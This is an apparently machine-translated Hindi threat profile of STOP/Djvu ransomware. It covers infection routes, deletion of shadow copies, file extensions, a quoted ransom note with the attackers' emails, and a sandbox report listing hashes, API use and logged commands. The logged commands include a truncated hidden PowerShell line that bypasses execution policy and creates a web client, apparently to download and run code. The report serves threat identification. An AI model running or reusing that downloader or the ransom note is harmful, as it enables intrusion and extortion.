बंद करो Djvu रैंसमवेयर

GoldSparrow से रैंसमवेयर तक

अनुवाद करने के लिए:

STOP रैनसमवेयर परिवार, जिसे STOP Djvu Ransomware परिवार भी कहा जाता है, मैलवेयर का एक खतरनाक टुकड़ा है। STOP Djvu कई खतरों में से एक है जो सामान्य विशेषताओं को साझा करता है और STOP रैंसमवेयर से उत्पन्न होता है, भले ही फ़ाइल प्रकारों को प्रभावित करने और फ़ाइल एक्सटेंशन को एन्क्रिप्ट करने के उनके कुछ तरीके अलग-अलग हों।

मूल STOP रैंसमवेयर को सुरक्षा शोधकर्ताओं ने फरवरी 2018 की शुरुआत में देखा था। हालाँकि, तब से यह विकसित हो गया है, और इसके क्लोन और ऑफशूट का परिवार बढ़ गया है। STOP रैनसमवेयर के वितरण की प्राथमिक विधि दूषित अनुलग्नकों का उपयोग करते हुए स्पैम ईमेल अभियान थे।

STOP Djvu Ransomware एक तरह से अपनी तरह के अन्य रैंसमवेयर खतरों के समान प्रदर्शन करता है, उपयोगकर्ताओं द्वारा अपने सिस्टम में उपयोग की जाने वाली प्रमुख फ़ाइलों तक पहुंच को एन्क्रिप्ट और अवरुद्ध करता है। व्यक्तिगत फ़ाइलें, चित्र, दस्तावेज़ और बहुत कुछ एन्क्रिप्ट किया जा सकता है और मशीन पर सभी उपयोगकर्ताओं के लिए अनिवार्य रूप से अक्षम किया जा सकता है। STOP Djvu Ransomware को पहली बार दिसंबर 2018 में वापस देखा गया था, जो ऑनलाइन संक्रमण का एक बहुत ही सफल अभियान प्रतीत होता था। शोधकर्ता इस बात से अनजान थे कि रैंसमवेयर कैसे फैलता है, लेकिन बाद में पीड़ितों ने बताया कि वे कीजेन्स या क्रैक डाउनलोड करने के बाद संक्रमण की खोज कर रहे थे। घुसपैठ होने के बाद, STOP Djvu रैंसमवेयर विंडोज़ सेटिंग्स को बदल देता है, फाइलों को कई नामों से जोड़ता है, जैसे .djvu, .djvus, .djvuu, .uudjvu, .udjvu या .djvuq और हाल ही में .promorad और .promock एक्सटेंशन। नए संस्करणों में अभी तक डिक्रिप्टर नहीं है, लेकिन पुराने संस्करणों को STOPDecrypter का उपयोग करके डिक्रिप्ट किया जा सकता है। उपयोगकर्ताओं को सलाह दी जाती है कि वे फिरौती देने से बचें, चाहे कुछ भी हो।

फ़ाइलों तक पहुंच को अवरुद्ध करने के लिए उपयोग की जाने वाली विधि RSA एन्क्रिप्शन एल्गोरिथम का उपयोग करती है। हालाँकि अनुभवहीन उपयोगकर्ताओं के लिए फ़ाइलों का डिक्रिप्शन कठिन लग सकता है, लेकिन निश्चित रूप से खतरे के पीछे के लोगों को भुगतान करने के लिए कोई प्रयास करने की आवश्यकता नहीं है। आमतौर पर ऐसी स्थितियों में झूठे वादे दिए जाते हैं, इसलिए उपयोगकर्ता जल्दी से पता लगा सकते हैं कि भुगतान करने के बाद उन्हें अनदेखा कर दिया गया है।

STOP Djvu Ransomware के हमले पहली बार 2018 के अंत में रिपोर्ट किए गए थे। STOP Djvu के वितरण का मुख्य तरीका स्पैम ईमेल रहा और रैंसमवेयर के मूल में बदलाव अपेक्षाकृत मामूली थे। स्पैम ईमेल में उपयोग किए गए अधिकांश नकली, समझौता किए गए अटैचमेंट मैक्रो-सक्षम कार्यालय दस्तावेज़ या नकली पीडीएफ फाइलें थे जो पीड़ित की जानकारी के बिना रैंसमवेयर चलाएंगे। STOP Djvu का व्यवहार भी ज्यादा नहीं बदला है - रैंसमवेयर अभी भी बैकअप से छुटकारा पाने के लिए सभी शैडो वॉल्यूम स्नैपशॉट को हटा रहा है, फिर पीड़ित की फाइलों को एन्क्रिप्ट करना शुरू कर देता है।

फिरौती नोट में मामूली बदलाव किए गए हैं, जिसे पीड़ित के डेस्कटॉप पर '_openme.txt' के रूप में सहेजा गया है। फिरौती नोट का पाठ यहां पाया जा सकता है:

'[फिरौती नोट शुरू]
—————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-

चिंता न करें, आप अपनी सभी फ़ाइलें वापस कर सकते हैं!
आपकी सभी फाइलें दस्तावेज, फोटो, डेटाबेस और अन्य महत्वपूर्ण मजबूत एन्क्रिप्शन और अद्वितीय कुंजी के साथ एन्क्रिप्टेड हैं।
फ़ाइलों को पुनर्प्राप्त करने का एकमात्र तरीका डिक्रिप्ट टूल और आपके लिए अद्वितीय कुंजी खरीदना है।
यह सॉफ्टवेयर आपकी सभी एन्क्रिप्टेड फाइलों को डिक्रिप्ट कर देगा।
हम आपको क्या गारंटी देते हैं?
आप अपने पीसी से अपनी एक एन्क्रिप्टेड फाइल भेज सकते हैं और हम इसे मुफ्त में डिक्रिप्ट करते हैं।
लेकिन हम केवल 1 फाइल को फ्री में डिक्रिप्ट कर सकते हैं। फ़ाइल में मूल्यवान जानकारी नहीं होनी चाहिए
तृतीय-पक्ष डिक्रिप्ट टूल का उपयोग करने का प्रयास न करें क्योंकि यह आपकी फ़ाइलों को नष्ट कर देगा।
छूट 50% उपलब्ध है यदि आप हमसे पहले 72 घंटे संपर्क करते हैं।

———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————

इस सॉफ़्टवेयर को प्राप्त करने के लिए आपको हमारे ई-मेल पर लिखना होगा:
helpshadow@india.com

हमसे संपर्क करने के लिए ई-मेल पता सुरक्षित रखें:
helpshadow@firemail.cc

आपकी व्यक्तिगत आईडी: [स्ट्रिंग]
[फिरौती नोट समाप्त]'

रैंसमवेयर ने मूल रूप से .djvu एक्सटेंशन के साथ एन्क्रिप्टेड फाइलों का नाम बदलने के लिए खुद को सीमित कर दिया, जो एक उत्सुक विकल्प था क्योंकि .djvu वास्तव में एटी एंड टी लैब्स द्वारा विकसित एक वैध फ़ाइल प्रारूप है और स्कैन किए गए दस्तावेज़ों को संग्रहीत करने के लिए उपयोग किया जाता है, कुछ हद तक एडोब के .pdf के समान। रैनसमवेयर के बाद के संस्करणों ने एन्क्रिप्टेड फ़ाइलों के लिए अन्य एक्सटेंशन की एक श्रृंखला को अपनाया, जिसमें '.chech,' '.luceq,' '.kroput1,' '.charck,' '.kropun,' .luces,' '.pulsar1, शामिल हैं। ' '.uudjvu,' '.djvur,' '.tfude,' '.tfudeq' और '.tfudet'।

STOP Djvu रैंसमवेयर के कुछ उपभेदों को तथाकथित 'STOPDecrypter' का उपयोग करके मुफ्त में डिक्रिप्ट किया जा सकता है, जिसे सुरक्षा शोधकर्ता माइकल गिलेस्पी द्वारा विकसित किया गया था और यह मुफ्त डाउनलोड के रूप में ऑनलाइन उपलब्ध है।

विषयसूची

बंद करो Djvu रैंसमवेयर वीडियो

युक्ति: अपनी ध्वनि चालू करें और वीडियो को पूर्ण स्क्रीन मोड में देखें ।

बंद करो Djvu रैंसमवेयर स्क्रीनशॉट

विश्लेषण रिपोर्ट

सामान्य जानकारी

Family Name:	STOP/DJVU Ransomware
Signature status:	Self Signed

Known Samples

MD5: def8a7bfe5fe47d95a95085d8dbc7a53

SHA1: 7182d4b2f55a560d83edf0824e119f71fa8422b6

SHA256: B83855EA63E7F28396099A5B6E877BE537E78E4A50DF720262461A1D13B02192

फाइल का आकार: 6.29 MB, 6292105 bytes

MD5: a6b8c0cb178c31dd347554c3e5a0d5f8

SHA1: 91864f269d696ee80869cfeb3c9a204f8031a3bb

SHA256: 4FFB8E9ADF508662B5E51CBEC75B2E07CE1CBBFAAB873F72EDC7BAC385421E2C

फाइल का आकार: 3.47 MB, 3471869 bytes

MD5: 2336c9624d9a44c393d354206226f508

SHA1: ea7edc388ad62990f52b9ed40df26d20f4e20190

SHA256: CE48ED04C92143B7E91F9665DD9337B2EE0B9CC1B5AEE534D26C09E084F8ABB0

फाइल का आकार: 1.36 MB, 1359918 bytes

MD5: 42f32aa699bc45a3638ddeb325ebebc1

SHA1: 508cea3ba2bf04cc6851295f92bf0e752071f6b8

SHA256: 16532B38591B713395C288B11610494BCC4C4537BE492D43C54D66FEB7B95FA4

फाइल का आकार: 1.33 MB, 1328186 bytes

MD5: 2391d41548b6432191f73edefa273928

SHA1: 620b714f84955aa7fb9a2f2cd528daa1621e18af

SHA256: 4D1EFAA3477B0B8D84025F3F0109E97ABA7CEB37F174B9DC79B7966CBB430959

फाइल का आकार: 3.36 MB, 3357556 bytes

MD5: 710c3a1beb616d4aa7d5ed9a7f8848e4

SHA1: 326da9ddc0ea840e83f31fbf1f3377a06c911fe5

SHA256: 051DAB5E5247E25D6EB059A574383FB1EC99A5A4AAF9AA3694240FE25FA260AB

फाइल का आकार: 1.36 MB, 1364106 bytes

MD5: 601b120a6f39f72847b2f581a3d5f158

SHA1: 0cc5781c1cfe6c5d034bd098229773e80e083732

SHA256: BEC2BFF460615A35D4EA35BF25E9F89337E35E73441A4AC07562CE8E89BED818

फाइल का आकार: 4.86 MB, 4858569 bytes

MD5: a7b76a49f289081961f8f3824f0b62ca

SHA1: 6908790199785be7fc6c4eeb1fe426ee1b66cc0b

SHA256: 1A721E054386833AEBBF94C75871143376897E92C4A48278DDE95E6987634F45

फाइल का आकार: 1.41 MB, 1406899 bytes

MD5: 9f37930d62a1e08f68aa0a72472e7a55

SHA1: 27706b3ff639e5dfa264a823dbe9229cf34ae153

SHA256: 29039902EEA4EE24C4C6368AA9B1D7F86BEC65ADA3ABDB0B92C1FEF311ACD31F

फाइल का आकार: 600.12 KB, 600124 bytes

MD5: 7a18839fe61e9cde0e8fea3100acfb2b

SHA1: 9476c97a73e027016e9f6f2f20c2fb19264cd837

SHA256: 0271095F0AD5C6F26C9738ED5636E751B8868C1AE3B08D5D8C5218121D9FEEAF

फाइल का आकार: 316.83 KB, 316832 bytes

Windows Portable Executable Attributes

File doesn't have "Rich" header
File doesn't have debug information
File doesn't have exports table
File doesn't have relocations information
File doesn't have security information
File has exports table
File has TLS information
File is 32-bit executable
File is 64-bit executable
File is either console or GUI application

File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
File is Native application (NOT .NET application)
File is not packed
IMAGE_FILE_DLL is not set inside PE header (Executable)
IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Windows PE Version Information

नाम	मूल्य
Assembly Version	1.4.1.0
Comments	This installation was built with Inno Setup.
Company Name	Alexander Roshal TrayToolbar WinTools Software Engineering, Ltd.
File Description	Archiwizer WinRAR Gestione archivi WinRAR RAM Saver Professional TrayToolbar WinRAR 5.60 64 Bit Setup WinRAR Installer
File Version	26.2.1 26.0.1 25.7.1 25.4.1 6.20.2 6.2.0 1.4.1.0 1.3.0.0 1.00
Internal Name	TJprojMain TrayToolbar.dll WinRAR
Legal Copyright	Copyright © Alexander Roshal 1993-2021 Copyright © Alexander Roshal 1993-2022 Copyright Â© Alexander Roshal 1993-2025 © Brontech, LLC
Original Filename	TJprojMain.exe TrayToolbar.dll WinRAR.exe
Product Name	Project1 RAM Saver 25.4.1 Professional RAM Saver 25.7.1 Professional RAM Saver 26.0.1 Professional RAM Saver 26.2.1 Professional TrayToolbar WinRAR WinRAR 5.60 64 Bit WinRAR Installer
Product Version	26.2.1 26.0.1 25.7.1 25.4.1 6.20.2 6.2.0 5.60 1.4.1+80dec33e25323db7125ddec35b475aa881292801 1.4.0 1.00

Digital Signatures

Signer	Root	Status
win.rar GmbH	DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1	Self Signed
win.rar GmbH	GlobalSign CodeSigning CA - SHA256 - G3	Hash Mismatch

File Traits

.NET
2+ executable sections
big overlay
HighEntropy
Inno
InnoSetup Installer
Installer Manifest
Installer Version
MZ (In Overlay)
No Version Info

Nullsoft Installer
RAR (In Overlay)
RARinO
Run
SusSec
vb6
WinRAR SFX
WRARSFX
x64
x86

Files Modified

File	Attributes
\device\namedpipe	Generic Read,Write Attributes
\device\namedpipe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-13e8d.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-88uan.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-8gkji.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-af9e7.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-du263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-i0kj9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-jos42.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-pk5hm.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data

c:\users\user\appdata\local\temp\is-r9udb.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-shkd6.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\nsva331.tmp\banner.dll	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsva331.tmp\nsexec.dll	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsva331.tmp\system.dll	Generic Write,Read Attributes

Registry Modifications

Key::Value	जानकारी	API Name
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	졷鑂셱ǜ	RegNtPreCreateKey

Windows API Usage

Category	API
Other Suspicious	SetWindowsHookEx
Anti Debug	IsDebuggerPresent OutputDebugString
User Data Access	GetUserDefaultLocaleName GetUserObjectInformation
Process Manipulation Evasion	NtUnmapViewOfSection ZwMapViewOfSection
Process Shell Execute	CreateProcess
Keyboard Access	GetKeyState
Syscall Use	ntdll.dll!NtAccessCheck ntdll.dll!NtAlertThreadByThreadId ntdll.dll!NtAlpcConnectPortEx ntdll.dll!NtAlpcCreateSecurityContext ntdll.dll!NtAlpcDeleteSecurityContext ntdll.dll!NtAlpcQueryInformation ntdll.dll!NtAlpcSendWaitReceivePort ntdll.dll!NtApphelpCacheControl ntdll.dll!NtClearEvent ntdll.dll!NtClose Show More ntdll.dll!NtConnectPort ntdll.dll!NtCreateEvent ntdll.dll!NtCreateMutant ntdll.dll!NtCreateSection ntdll.dll!NtCreateSemaphore ntdll.dll!NtCreateThreadEx ntdll.dll!NtDuplicateObject ntdll.dll!NtDuplicateToken ntdll.dll!NtEnumerateValueKey ntdll.dll!NtFreeVirtualMemory ntdll.dll!NtMapViewOfSection ntdll.dll!NtNotifyChangeKey ntdll.dll!NtOpenDirectoryObject ntdll.dll!NtOpenEvent ntdll.dll!NtOpenFile ntdll.dll!NtOpenKey ntdll.dll!NtOpenKeyEx ntdll.dll!NtOpenProcessToken ntdll.dll!NtOpenProcessTokenEx ntdll.dll!NtOpenSection ntdll.dll!NtOpenSemaphore ntdll.dll!NtOpenThreadToken ntdll.dll!NtOpenThreadTokenEx ntdll.dll!NtProtectVirtualMemory ntdll.dll!NtQueryAttributesFile ntdll.dll!NtQueryFullAttributesFile ntdll.dll!NtQueryInformationFile ntdll.dll!NtQueryInformationProcess ntdll.dll!NtQueryInformationThread ntdll.dll!NtQueryInformationToken ntdll.dll!NtQueryKey ntdll.dll!NtQueryLicenseValue ntdll.dll!NtQueryPerformanceCounter ntdll.dll!NtQuerySecurityAttributesToken ntdll.dll!NtQuerySecurityObject ntdll.dll!NtQuerySystemInformation ntdll.dll!NtQuerySystemInformationEx ntdll.dll!NtQueryValueKey ntdll.dll!NtQueryVirtualMemory ntdll.dll!NtQueryVolumeInformationFile ntdll.dll!NtQueryWnfStateData ntdll.dll!NtReleaseMutant ntdll.dll!NtReleaseSemaphore ntdll.dll!NtReleaseWorkerFactoryWorker ntdll.dll!NtRequestWaitReplyPort ntdll.dll!NtResumeThread ntdll.dll!NtSetEvent ntdll.dll!NtSetInformationKey ntdll.dll!NtSetInformationProcess ntdll.dll!NtSetInformationThread ntdll.dll!NtSetInformationVirtualMemory ntdll.dll!NtSetInformationWorkerFactory ntdll.dll!NtSetTimer2 ntdll.dll!NtSubscribeWnfStateChange ntdll.dll!NtTestAlert ntdll.dll!NtTraceControl ntdll.dll!NtUnmapViewOfSection ntdll.dll!NtUnmapViewOfSectionEx ntdll.dll!NtWaitForAlertByThreadId ntdll.dll!NtWaitForMultipleObjects ntdll.dll!NtWaitForSingleObject ntdll.dll!NtWaitForWorkViaWorkerFactory ntdll.dll!NtWaitLowEventPair ntdll.dll!NtWorkerFactoryWorkerReady ntdll.dll!NtWriteFile UNKNOWN
Encryption Used	BCryptOpenAlgorithmProvider

Shell Command Execution


							"C:\Users\Lehsoaco\AppData\Local\Temp\is-88UAN.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp" /SL5="$5036E,928289,131584,c:\users\user\downloads\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918"


							"C:\Users\Dfhrhqtz\AppData\Local\Temp\is-13E8D.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp" /SL5="$802E8,896816,131584,c:\users\user\downloads\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186"


							"C:\Users\Eberzneu\AppData\Local\Temp\is-DU263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp" /SL5="$30364,932379,131584,c:\users\user\downloads\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106"


							"C:\Users\Qxnqehmu\AppData\Local\Temp\is-8GKJI.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp" /SL5="$402E8,3435751,309760,c:\users\user\downloads\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569"


							"C:\Users\Qlwpcgcn\AppData\Local\Temp\is-I0KJ9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp" /SL5="$30336,975597,131584,c:\users\user\downloads\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899"


									powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "try { $WebClient = New-Object System.Net.WebClient

खोज

क्षेत्र बदलें

बंद करो Djvu रैंसमवेयर

बंद करो Djvu रैंसमवेयर वीडियो

बंद करो Djvu रैंसमवेयर स्क्रीनशॉट

विश्लेषण रिपोर्ट

सामान्य जानकारी

Known Samples

Known Samples

Windows Portable Executable Attributes

Windows Portable Executable Attributes

File Icons

File Icons

Windows PE Version Information

Windows PE Version Information

Digital Signatures

Digital Signatures

File Traits

Files Modified

Files Modified

Registry Modifications

Registry Modifications

Windows API Usage

Windows API Usage

Shell Command Execution

Shell Command Execution

टिप्पणी भेजें

रुझान

आइस ओपन नेटवर्क (आईओपी) एयरड्रॉप

आपका खाता सुरक्षित है और तैयार है - ईमेल घोटाला

ValidVersion.app

सबसे ज्यादा देखा गया

'प्रिंटर ड्राइवर अनुपलब्ध है' त्रुटि को कैसे ठीक करें?

स्क्रीन साझा करते समय कलह काली स्क्रीन दिखाता है

एपोर्नर.कॉम